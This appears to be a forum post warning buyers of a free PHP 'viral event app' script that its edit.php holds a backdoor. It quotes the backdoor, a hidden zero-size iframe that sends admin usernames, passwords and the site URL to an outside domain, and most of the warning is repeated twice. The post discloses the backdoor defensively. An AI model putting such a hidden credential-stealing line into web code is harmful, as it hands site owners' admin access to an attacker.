- Jan 8, 2010
- 13,623
- 8,250
This is warning to all those who downloaded this script, shared by someone here,
Infraction Viral Event App
With file name
Infraction Viral Event App.zip
A fellow BHW member passed me a copy today and I had a look in the code and I found the code had a backdoor.
On line number 155, in edit.php file.
So whoever owns this domian, has access to all the admin panels of the script on all servers it was installed.
He is pawning on your hardwork, so before he causes you more damage just delete the script if you have installed it and get it investigated by an expert before using it.
And learn your lesson that no one will give you free gold free of cost. The event app is a hot gold mine now so dont fall any trap and install anything you get and open backdoors on your servers.
Take Care Guys,
IndianBill007
PS: Apparently this file comes from this forum - http://*******VIP.COM
as per the note in the files.
Infraction Viral Event App
With file name
Infraction Viral Event App.zip
A fellow BHW member passed me a copy today and I had a look in the code and I found the code had a backdoor.
On line number 155, in edit.php file.
Code:
<iframe src="http://facecatch.info/index.php?adminu=<?php echo urlencode($adminu); ?>&adminp=<?php echo urlencode($adminp); ?>&url=<?php echo "http://" . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];?>" width="0" height="0" frameborder="0">
So whoever owns this domian, has access to all the admin panels of the script on all servers it was installed.
He is pawning on your hardwork, so before he causes you more damage just delete the script if you have installed it and get it investigated by an expert before using it.
And learn your lesson that no one will give you free gold free of cost. The event app is a hot gold mine now so dont fall any trap and install anything you get and open backdoors on your servers.
Take Care Guys,
IndianBill007
PS: Apparently this file comes from this forum - http://*******VIP.COM
as per the note in the files.